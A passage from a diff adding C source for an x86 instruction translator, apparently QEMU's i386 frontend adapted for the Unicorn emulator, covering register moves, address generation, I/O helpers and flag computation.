MO_16 : MO_64; + } else { + return ot; + } +} + +/* Select only size 64 else 32. Used for SSE operand sizes. */ +static inline TCGMemOp mo_64_32(TCGMemOp ot) +{ +#ifdef TARGET_X86_64 + return ot == MO_64 ? MO_64 : MO_32; +#else + return MO_32; +#endif +} + +/* Select size 8 if lsb of B is clear, else OT. Used for decoding + byte vs word opcodes. */ +static inline TCGMemOp mo_b_d(int b, TCGMemOp ot) +{ + return b & 1 ? ot : MO_8; +} + +/* Select size 8 if lsb of B is clear, else OT capped at 32. + Used for decoding operand size of port opcodes. */ +static inline TCGMemOp mo_b_d32(int b, TCGMemOp ot) +{ + return b & 1 ? (ot == MO_16 ? MO_16 : MO_32) : MO_8; +} + +static void gen_op_mov_reg_v(TCGContext *s, TCGMemOp ot, int reg, TCGv t0) +{ + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + switch(ot) { + case MO_8: + if (!byte_reg_is_xH(s->x86_64_hregs, reg)) { + tcg_gen_deposit_tl(s, *cpu_regs[reg], *cpu_regs[reg], t0, 0, 8); + } else { + tcg_gen_deposit_tl(s, *cpu_regs[reg - 4], *cpu_regs[reg - 4], t0, 8, 8); + } + break; + case MO_16: + tcg_gen_deposit_tl(s, *cpu_regs[reg], *cpu_regs[reg], t0, 0, 16); + break; + case MO_32: + /* For x86_64, this sets the higher half of register to zero. + For i386, this is equivalent to a mov. */ + tcg_gen_ext32u_tl(s, *cpu_regs[reg], t0); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_mov_tl(s, *cpu_regs[reg], t0); + break; +#endif + default: + tcg_abort(); + } +} + +static inline void gen_op_mov_v_reg(TCGContext *s, TCGMemOp ot, TCGv t0, int reg) +{ + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + if (ot == MO_8 && byte_reg_is_xH(s->x86_64_hregs, reg)) { + tcg_gen_shri_tl(s, t0, *cpu_regs[reg - 4], 8); + tcg_gen_ext8u_tl(s, t0, t0); + } else { + tcg_gen_mov_tl(s, t0, *cpu_regs[reg]); + } +} + +static inline void gen_op_movl_A0_reg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_A0, *cpu_regs[reg]); +} + +static inline void gen_op_addl_A0_im(TCGContext *s, int32_t val) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_addi_tl(s, cpu_A0, cpu_A0, val); +#ifdef TARGET_X86_64 + tcg_gen_andi_tl(s, cpu_A0, cpu_A0, 0xffffffff); +#endif +} + +#ifdef TARGET_X86_64 +static inline void gen_op_addq_A0_im(TCGContext *s, int64_t val) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_addi_tl(s, cpu_A0, cpu_A0, val); +} +#endif + +static void gen_add_A0_im(DisasContext *s, int val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; +#ifdef TARGET_X86_64 + if (CODE64(s)) + gen_op_addq_A0_im(tcg_ctx, val); + else +#endif + gen_op_addl_A0_im(tcg_ctx, val); +} + +static inline void gen_op_jmp_v(TCGContext *s, TCGv dest) +{ + tcg_gen_st_tl(s, dest, s->cpu_env, offsetof(CPUX86State, eip)); +} + +static inline void gen_op_add_reg_im(TCGContext *s, TCGMemOp size, int reg, int32_t val) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_addi_tl(s, cpu_tmp0, *cpu_regs[reg], val); + gen_op_mov_reg_v(s, size, reg, cpu_tmp0); +} + +static inline void gen_op_add_reg_T0(TCGContext *s, TCGMemOp size, int reg) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_T = (TCGv **)s->cpu_T; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_add_tl(s, cpu_tmp0, *cpu_regs[reg], *cpu_T[0]); + gen_op_mov_reg_v(s, size, reg, cpu_tmp0); +} + +static inline void gen_op_addl_A0_reg_sN(TCGContext *s, int shift, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[reg]); + if (shift != 0) + tcg_gen_shli_tl(s, cpu_tmp0, cpu_tmp0, shift); + tcg_gen_add_tl(s, cpu_A0, cpu_A0, cpu_tmp0); + /* For x86_64, this sets the higher half of register to zero. + For i386, this is equivalent to a nop. */ + tcg_gen_ext32u_tl(s, cpu_A0, cpu_A0); +} + +static inline void gen_op_movl_A0_seg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_ld32u_tl(s, cpu_A0, s->cpu_env, offsetof(CPUX86State, segs[reg].base) + REG_L_OFFSET); +} + +static inline void gen_op_addl_A0_seg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[reg].base)); +#ifdef TARGET_X86_64 + if (CODE64(s)) { + tcg_gen_andi_tl(tcg_ctx, cpu_A0, cpu_A0, 0xffffffff); + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + } else { + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + tcg_gen_andi_tl(tcg_ctx, cpu_A0, cpu_A0, 0xffffffff); + } +#else + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); +#endif +} + +#ifdef TARGET_X86_64 +static inline void gen_op_movq_A0_seg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_ld_tl(s, cpu_A0, s->cpu_env, offsetof(CPUX86State, segs[reg].base)); +} + +static inline void gen_op_addq_A0_seg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + + tcg_gen_ld_tl(s, cpu_tmp0, s->cpu_env, offsetof(CPUX86State, segs[reg].base)); + tcg_gen_add_tl(s, cpu_A0, cpu_A0, cpu_tmp0); +} + +static inline void gen_op_movq_A0_reg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_A0, *cpu_regs[reg]); +} + +static inline void gen_op_addq_A0_reg_sN(TCGContext *s, int shift, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[reg]); + if (shift != 0) + tcg_gen_shli_tl(s, cpu_tmp0, cpu_tmp0, shift); + tcg_gen_add_tl(s, cpu_A0, cpu_A0, cpu_tmp0); +} +#endif + +static inline void gen_op_ld_v(DisasContext *s, int idx, TCGv t0, TCGv a0) +{ + if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ)) + gen_jmp_im(s, s->prev_pc); // Unicorn: sync EIP + tcg_gen_qemu_ld_tl(s->uc, t0, a0, s->mem_index, idx | MO_LE); +} + +static inline void gen_op_st_v(DisasContext *s, int idx, TCGv t0, TCGv a0) +{ + if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) + gen_jmp_im(s, s->prev_pc); // Unicorn: sync EIP + tcg_gen_qemu_st_tl(s->uc, t0, a0, s->mem_index, idx | MO_LE); +} + +static inline void gen_op_st_rm_T0_A0(DisasContext *s, int idx, int d) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (d == OR_TMP0) { + gen_op_st_v(s, idx, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, idx, d, *cpu_T[0]); + } +} + +static inline void gen_jmp_im(DisasContext *s, target_ulong pc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, pc); + gen_op_jmp_v(tcg_ctx, cpu_tmp0); +} + +static inline void gen_string_movl_A0_ESI(DisasContext *s) +{ + int override; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + override = s->override; + switch (s->aflag) { +#ifdef TARGET_X86_64 + case MO_64: + if (override >= 0) { + gen_op_movq_A0_seg(tcg_ctx, override); + gen_op_addq_A0_reg_sN(tcg_ctx, 0, R_ESI); + } else { + gen_op_movq_A0_reg(tcg_ctx, R_ESI); + } + break; +#endif + case MO_32: + /* 32 bit address */ + if (s->addseg && override < 0) + override = R_DS; + if (override >= 0) { + gen_op_movl_A0_seg(tcg_ctx, override); + gen_op_addl_A0_reg_sN(tcg_ctx, 0, R_ESI); + } else { + gen_op_movl_A0_reg(tcg_ctx, R_ESI); + } + break; + case MO_16: + /* 16 address, always override */ + if (override < 0) + override = R_DS; + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESI]); + gen_op_addl_A0_seg(s, override); + break; + default: + tcg_abort(); + } +} + +static inline void gen_string_movl_A0_EDI(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + switch (s->aflag) { +#ifdef TARGET_X86_64 + case MO_64: + gen_op_movq_A0_reg(tcg_ctx, R_EDI); + break; +#endif + case MO_32: + if (s->addseg) { + gen_op_movl_A0_seg(tcg_ctx, R_ES); + gen_op_addl_A0_reg_sN(tcg_ctx, 0, R_EDI); + } else { + gen_op_movl_A0_reg(tcg_ctx, R_EDI); + } + break; + case MO_16: + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EDI]); + gen_op_addl_A0_seg(s, R_ES); + break; + default: + tcg_abort(); + } +} + +static inline void gen_op_movl_T0_Dshift(TCGContext *s, TCGMemOp ot) +{ + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_ld32s_tl(s, *cpu_T[0], s->cpu_env, offsetof(CPUX86State, df)); + tcg_gen_shli_tl(s, *cpu_T[0], *cpu_T[0], ot); +}; + +static TCGv gen_ext_tl(TCGContext *s, TCGv dst, TCGv src, TCGMemOp size, bool sign) +{ + switch (size) { + case MO_8: + if (sign) { + tcg_gen_ext8s_tl(s, dst, src); + } else { + tcg_gen_ext8u_tl(s, dst, src); + } + return dst; + case MO_16: + if (sign) { + tcg_gen_ext16s_tl(s, dst, src); + } else { + tcg_gen_ext16u_tl(s, dst, src); + } + return dst; +#ifdef TARGET_X86_64 + case MO_32: + if (sign) { + tcg_gen_ext32s_tl(s, dst, src); + } else { + tcg_gen_ext32u_tl(s, dst, src); + } + return dst; +#endif + default: + return src; + } +} + +static void gen_extu(TCGContext *s, TCGMemOp ot, TCGv reg) +{ + gen_ext_tl(s, reg, reg, ot, false); +} + +static void gen_exts(TCGContext *s, TCGMemOp ot, TCGv reg) +{ + gen_ext_tl(s, reg, reg, ot, true); +} + +static inline void gen_op_jnz_ecx(TCGContext *s, TCGMemOp size, int label1) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[R_ECX]); + gen_extu(s, size, cpu_tmp0); + tcg_gen_brcondi_tl(s, TCG_COND_NE, cpu_tmp0, 0, label1); +} + +static inline void gen_op_jz_ecx(TCGContext *s, TCGMemOp size, int label1) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[R_ECX]); + gen_extu(s, size, cpu_tmp0); + tcg_gen_brcondi_tl(s, TCG_COND_EQ, cpu_tmp0, 0, label1); +} + +static void gen_helper_in_func(TCGContext *s, TCGMemOp ot, TCGv v, TCGv_i32 n) +{ + switch (ot) { + case MO_8: + gen_helper_inb(s, v, tcg_const_ptr(s, s->uc), n); + break; + case MO_16: + gen_helper_inw(s, v, tcg_const_ptr(s, s->uc), n); + break; + case MO_32: + gen_helper_inl(s, v, tcg_const_ptr(s, s->uc), n); + break; + default: + tcg_abort(); + } +} + +static void gen_helper_out_func(TCGContext *s, TCGMemOp ot, TCGv_i32 v, TCGv_i32 n) +{ + switch (ot) { + case MO_8: + gen_helper_outb(s, tcg_const_ptr(s, s->uc), v, n); + break; + case MO_16: + gen_helper_outw(s, tcg_const_ptr(s, s->uc), v, n); + break; + case MO_32: + gen_helper_outl(s, tcg_const_ptr(s, s->uc), v, n); + break; + default: + tcg_abort(); + } +} + +static void gen_check_io(DisasContext *s, TCGMemOp ot, target_ulong cur_eip, + uint32_t svm_flags) +{ + int state_saved; + target_ulong next_eip; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + // Unicorn: allow all I/O instructions + return; + + state_saved = 0; + if (s->pe && (s->cpl > s->iopl || s->vm86)) { + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + state_saved = 1; + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + switch (ot) { + case MO_8: + gen_helper_check_iob(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32); + break; + case MO_16: + gen_helper_check_iow(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32); + break; + case MO_32: + gen_helper_check_iol(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32); + break; + default: + tcg_abort(); + } + } + if(s->flags & HF_SVMI_MASK) { + if (!state_saved) { + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + } + svm_flags |= (1 << (4 + ot)); + next_eip = s->pc - s->cs_base; + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_svm_check_io(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32, + tcg_const_i32(tcg_ctx, svm_flags), + tcg_const_i32(tcg_ctx, next_eip - cur_eip)); + } +} + +static inline void gen_movs(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_ESI(s); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + gen_string_movl_A0_EDI(s); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static void gen_op_update1_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); +} + +static void gen_op_update2_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)s->cpu_cc_src; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_src, *cpu_T[1]); + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); +} + +static void gen_op_update3_cc(TCGContext *s, TCGv reg) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)s->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)s->cpu_cc_src2; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_src2, reg); + tcg_gen_mov_tl(s, cpu_cc_src, *cpu_T[1]); + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); +} + +static inline void gen_op_testl_T0_T1_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_and_tl(s, cpu_cc_dst, *cpu_T[0], *cpu_T[1]); +} + +static void gen_op_update_neg_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)s->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)s->cpu_cc_srcT; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); + tcg_gen_neg_tl(s, cpu_cc_src, *cpu_T[0]); + tcg_gen_movi_tl(s, cpu_cc_srcT, 0); +} + +/* compute all eflags to cc_src */ +static void gen_compute_eflags(DisasContext *s) +{ + TCGv zero, dst, src1, src2; + int live, dead; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + + if (s->cc_op == CC_OP_EFLAGS) { + return; + } + if (s->cc_op == CC_OP_CLR) { + tcg_gen_movi_tl(tcg_ctx, cpu_cc_src, CC_Z | CC_P); + set_cc_op(s, CC_OP_EFLAGS); + return; + } + + TCGV_UNUSED(zero); + dst = cpu_cc_dst; + src1 = cpu_cc_src; + src2 = cpu_cc_src2; + + /* Take care to not read values that are not live. */ + live = cc_op_live[s->cc_op] & ~USES_CC_SRCT; + dead = live ^ (USES_CC_DST | USES_CC_SRC | USES_CC_SRC2); + if (dead) { + zero = tcg_const_tl(tcg_ctx, 0); + if (dead & USES_CC_DST) { + dst = zero; + } + if (dead & USES_CC_SRC) { + src1 = zero; + } + if (dead & USES_CC_SRC2) { + src2 = zero; + } + } + + gen_update_cc_op(s); + gen_helper_cc_compute_all(tcg_ctx, cpu_cc_src, dst, src1, src2, cpu_cc_op); + set_cc_op(s, CC_OP_EFLAGS); + + if (dead) { + tcg_temp_free(tcg_ctx, zero); + } +} + +typedef struct CCPrepare { + TCGCond cond; + TCGv reg; + TCGv reg2; + target_ulong imm; + target_ulong mask; + bool use_reg2; + bool no_setcond; +} CCPrepare; + +static inline CCPrepare ccprepare_make(TCGCond cond, + TCGv reg, TCGv reg2, + target_ulong imm, target_ulong mask, + bool use_reg2, bool no_setcond) +{ + CCPrepare cc = { cond, reg, reg2, imm, mask, use_reg2, no_setcond }; + return cc; +} + +/* compute eflags.C to reg */ +static CCPrepare gen_prepare_eflags_c(DisasContext *s, TCGv reg) +{ + TCGv t0, t1; + int size, shift; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + switch (s->cc_op) { + case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: + /* (DATA_TYPE)CC_SRCT < (DATA_TYPE)CC_SRC */ + size = s->cc_op - CC_OP_SUBB; + t1 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, false); + /* If no temporary was used, be careful not to alias t1 and t0. */ + t0 = TCGV_EQUAL(t1, cpu_cc_src) ? cpu_tmp0 : reg; + tcg_gen_mov_tl(tcg_ctx, t0, cpu_cc_srcT); + gen_extu(tcg_ctx, size, t0); + goto add_sub; + + case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: + /* (DATA_TYPE)CC_DST < (DATA_TYPE)CC_SRC */ + size = s->cc_op - CC_OP_ADDB; + t1 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, false); + t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_dst, size, false); + add_sub: + return ccprepare_make(TCG_COND_LTU, t0, t1, 0, -1, true, false); + + case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: + case CC_OP_CLR: + return ccprepare_make(TCG_COND_NEVER, 0, 0, 0, -1, false, false); + + case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: + case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, -1, false, true); + + case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: + /* (CC_SRC >> (DATA_BITS - 1)) & 1 */ + size = s->cc_op - CC_OP_SHLB; + shift = (8 << size) - 1; + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, (target_ulong)(1ULL << shift), false, false); + + case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, -1, false, false); + + case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: + size = s->cc_op - CC_OP_BMILGB; + t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_src, size, false); + return ccprepare_make(TCG_COND_EQ, t0, 0, 0, -1, false, false); + + case CC_OP_ADCX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_dst, 0, 0, -1, false, true); + + case CC_OP_EFLAGS: + case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: + /* CC_SRC & 1 */ + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_C, false, false); + + default: + /* The need to compute only C from CC_OP_DYNAMIC is important + in efficiently implementing e.g. INC at the start of a TB. */ + gen_update_cc_op(s); + gen_helper_cc_compute_c(tcg_ctx, reg, cpu_cc_dst, cpu_cc_src, + cpu_cc_src2, cpu_cc_op); + return ccprepare_make(TCG_COND_NE, reg, 0, 0, -1, false, true); + } +} + +/* compute eflags.P to reg */ +static CCPrepare gen_prepare_eflags_p(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + gen_compute_eflags(s); + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_P, false, false); +} + +/* compute eflags.S to reg */ +static CCPrepare gen_prepare_eflags_s(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + switch (s->cc_op) { + case CC_OP_DYNAMIC: + gen_compute_eflags(s); + /* FALLTHRU */ + case CC_OP_EFLAGS: + case CC_OP_ADCX: + case CC_OP_ADOX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_S, false, false); + case CC_OP_CLR: + return ccprepare_make(TCG_COND_NEVER, 0, 0, 0, -1, false, false); + default: + { + TCGMemOp size = (s->cc_op - CC_OP_ADDB) & 3; + TCGv t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_dst, size, true); + return ccprepare_make(TCG_COND_LT, t0, 0, 0, -1, false, false); + } + } +} + +/* compute eflags.O to reg */ +static CCPrepare gen_prepare_eflags_o(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + + switch (s->cc_op) { + case CC_OP_ADOX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_src2, 0, 0, -1, false, true); + case CC_OP_CLR: + return ccprepare_make(TCG_COND_NEVER, 0, 0, 0, -1, false, false); + default: + gen_compute_eflags(s); + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_O, false, false); + } +} + +/* compute eflags.Z to reg */ +static CCPrepare gen_prepare_eflags_z(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + switch (s->cc_op) { + case CC_OP_DYNAMIC: + gen_compute_eflags(s); + /* FALLTHRU */ + case CC_OP_EFLAGS: + case CC_OP_ADCX: + case CC_OP_ADOX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_Z, false, false); + case CC_OP_CLR: + return ccprepare_make(TCG_COND_ALWAYS, 0, 0, 0, -1, false, false); + default: + { + TCGMemOp size = (s->cc_op - CC_OP_ADDB) & 3; + TCGv t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_dst, size, false); + return ccprepare_make(TCG_COND_EQ, t0, 0, 0, -1, false, false); + } + } +} + +/* perform a conditional store into register 'reg' according to jump opcode + value 'b'. In the fast case, T0 is guaranted not to be used. */ +static CCPrepare gen_prepare_cc(DisasContext *s, int b, TCGv reg) +{ + int inv, jcc_op, cond; + TCGMemOp size; + CCPrepare cc; + TCGv t0; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + + inv = b & 1; + jcc_op = (b >> 1) & 7; + + switch (s->cc_op) { + case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: + /* We optimize relational operators for the cmp/jcc case. */ + size = s->cc_op - CC_OP_SUBB; + switch (jcc_op) { + case JCC_BE: + tcg_gen_mov_tl(tcg_ctx, cpu_tmp4, cpu_cc_srcT); + gen_extu(tcg_ctx, size, cpu_tmp4); + t0 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, false); + cc = ccprepare_make(TCG_COND_LEU, cpu_tmp4, t0, 0, -1, true, false); + break; + + case JCC_L: + cond = TCG_COND_LT; + goto fast_jcc_l; + case JCC_LE: + cond = TCG_COND_LE; + fast_jcc_l: + tcg_gen_mov_tl(tcg_ctx, cpu_tmp4, cpu_cc_srcT); + gen_exts(tcg_ctx, size, cpu_tmp4); + t0 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, true); + cc = ccprepare_make(cond, cpu_tmp4, t0, 0, -1, true, false); + break; + + default: + goto slow_jcc; + } + break; + + default: + slow_jcc: + /* This actually generates good code for JC, JZ and JS. */ + switch (jcc_op) { + case JCC_O: + cc = gen_prepare_eflags_o(s, reg); + break; + case JCC_B: + cc = gen_prepare_eflags_c(s, reg); + break; + case JCC_Z: + cc = gen_prepare_eflags_z(s, reg); + break; + case JCC_BE: + gen_compute_eflags(s); + cc = ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_Z | CC_C, false, false); + break; + case JCC_S: + cc = gen_prepare_eflags_s(s, reg); + break; + case JCC_P: + cc = gen_prepare_eflags_p(s, reg); + break; + case JCC_L: + gen_compute_eflags(s); + if (TCGV_EQUAL(reg, cpu_cc_src)) { + reg = cpu_tmp0; + } + tcg_gen_shri_tl(tcg_ctx, reg, cpu_cc_src, 4); /* CC_O -> CC_S */ + tcg_gen_xor_tl(tcg_ctx, reg, reg, cpu_cc_src); + cc = ccprepare_make(TCG_COND_NE, reg, 0, 0, CC_S, false, false); + break; + default: + case JCC_LE: + gen_compute_eflags(s); + if (TCGV_EQUAL(reg, cpu_cc_src)) { + reg = cpu_tmp0; + } + tcg_gen_shri_tl(tcg_ctx, reg, cpu_cc_src, 4); /* CC_O -> CC_S */ + tcg_gen_xor_tl(tcg_ctx, reg, reg, cpu_cc_src); + cc = ccprepare_make(TCG_COND_NE, reg, 0, 0, CC_S | CC_Z, false, false); + break; + } + break; + } + + if (inv) { + cc.cond = tcg_invert_cond(cc.cond); + } + return cc; +} + +static void gen_setcc1(DisasContext *s, int b, TCGv reg) +{ + CCPrepare cc = gen_prepare_cc(s, b, reg); + TCGContext *tcg_ctx = 